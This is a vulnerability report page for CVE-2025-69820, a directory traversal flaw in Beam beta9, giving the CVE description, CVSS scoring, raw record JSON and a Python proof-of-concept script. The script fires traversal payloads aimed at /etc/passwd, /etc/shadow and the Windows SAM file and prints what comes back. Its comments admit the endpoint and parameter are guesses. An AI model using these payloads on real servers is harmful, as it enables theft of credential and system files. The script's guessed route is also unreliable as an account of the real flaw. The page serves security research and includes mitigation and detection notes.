Security Vulnerability Report
CVE-2025-69820 CVSS 6.0 MEDIUM

CVE-2025-69820

Published: 2026-01-22 16:16:08
Last Modified: 2026-02-02 20:33:57

Description

Directory Traversal vulnerability in Beam beta9 v.0.1.521 allows a remote attacker to obtain sensitive information via the joinCleanPath function.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:beam:beta9:0.1.521:*:*:*:*:*:*:* - VULNERABLE
Beam beta9 v.0.1.521

PoC / Exploit Code

⚠ For Security Research Only
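The following code is for security research and authorized testing only. Its request endpoint and `clean` parameter are not confirmed by the CVE record, which names only the joinCleanPath function; the script's own comments note that the exact endpoint depends on how that function is used.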
python
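# CVE-2025-69820 PoC - Directory Traversal in Beam beta9
# Target: Beam beta9 v.0.1.521
# Vulnerability: joinCleanPath function in pkg/abstractions/volume/multipart.go
#
# NOTE(review): the route and the "clean" query parameter used below are this
# script's own guess at how joinCleanPath is reached; the CVE record names only
# the function. The record's CVSS vector is AV:L/PR:H, so an unauthenticated
# HTTP GET may not match the real attack surface. Treat any result from this
# script as a hint to investigate, not as confirmation.
#
# Defender notes:
#   * Mitigation: after joining a caller-supplied path onto a base directory,
#     resolve the result and reject it unless it is still inside that base
#     directory. Move to a release that contains the fix (the fixed version is
#     not given on this page).
#   * Detection: review access logs for volume operations whose path argument
#     contains "../" or "..\" sequences, including URL-encoded forms.
import requests
import urllib.parse

TARGET_URL = "http://target-beam-server:8080"

# Upper bound, in seconds, for every HTTP request so a silent host cannot hang
# the script.
_REQUEST_TIMEOUT = 10


def exploit_directory_traversal():
    """Send each traversal path to the assumed endpoint and print the outcome.

    For every payload one GET request is issued. A 200 response prints the
    first 500 characters of the body, a 403 is reported as access denied, and
    any other status is printed as-is. Request errors are caught and printed,
    so one failing payload does not stop the loop.

    Returns:
        None. All results are written to stdout.
    """
    # Path traversal payloads to read sensitive files
    payloads = [
        "../../../../etc/passwd",
        "../../../../etc/shadow",
        "../../../etc/hosts",
        "../../../../../../../../../etc/passwd",
        # Raw string: the original literal relied on invalid escape sequences
        # ("\.", "\w", "\s", "\c"), which newer Python versions warn about.
        r"..\..\..\..\windows\system32\config\sam",  # Windows target
    ]

    for payload in payloads:
        # The exact endpoint depends on the vulnerable function usage
        endpoint = f"{TARGET_URL}/api/v1/volume/read"
        params = {
            "path": payload,
            "clean": "true",  # Intended to trigger the joinCleanPath function
        }

        try:
            response = requests.get(
                endpoint, params=params, timeout=_REQUEST_TIMEOUT
            )
        except requests.exceptions.RequestException as e:
            print(f"[!] Error with payload {payload}: {e}")
            continue

        if response.status_code == 200:
            print(f"[+] Success with payload: {payload}")
            print(f"[+] Content:\n{response.text[:500]}")
        elif response.status_code == 403:
            print(f"[-] Access denied with payload: {payload}")
        else:
            print(f"[*] Status {response.status_code} with payload: {payload}")


def check_vulnerability():
    """Check whether the target answers a traversal request with HTTP 200.

    Returns:
        True if the single test request returned status 200, otherwise False.
        False is also returned when the request itself fails (timeout,
        connection error); the error is printed in that case.
    """
    # Test with a benign file to verify path traversal works
    test_path = "../../../../etc/hostname"

    endpoint = f"{TARGET_URL}/api/v1/volume/read"
    params = {
        "path": test_path,
        "clean": "true",
    }

    try:
        # The original call had no timeout and no error handling, so an
        # unreachable host either hung the script or ended it with a traceback.
        response = requests.get(
            endpoint, params=params, timeout=_REQUEST_TIMEOUT
        )
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during vulnerability check: {e}")
        return False

    # NOTE(review): status 200 alone is weak evidence. A catch-all route or an
    # error page served with 200 produces a false positive; confirm against the
    # response body and the installed version before acting on this verdict.
    if response.status_code == 200:
        print("[!] Target appears to be VULNERABLE to CVE-2025-69820")
        return True

    print("[-] Target does not appear to be vulnerable")
    return False


if __name__ == "__main__":
    print("CVE-2025-69820 - Beam beta9 Directory Traversal PoC")
    print("=" * 60)

    check_vulnerability()
    print("\n[*] Attempting exploitation...")
    exploit_directory_traversal()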

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69820", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:07.820", "lastModified": "2026-02-02T20:33:56.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory Traversal vulnerability in Beam beta9 v.0.1.521 allows a remote attacker to obtain sensitive information via the joinCleanPath function."}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en Beam beta9 v.0.1.521 permite a un atacante remoto obtener información sensible a través de la función joinCleanPath."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:beam:beta9:0.1.521:*:*:*:*:*:*:*", "matchCriteriaId": "9A92A6DC-4A4D-4A2A-A818-1F11BDB7A89F"}]}]}], "references": [{"url": "https://github.com/aws/aws-sdk-php/security/advisories/GHSA-557v-xcg6-rm5m", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/beam-cloud/beta9/blob/c1cd75e813cf7d53e916157d920099e89ef45caa/pkg/abstractions/volume/multipart.go#L45", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ryotaromatsui/CVEs/tree/main/CVE-2025-69820", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}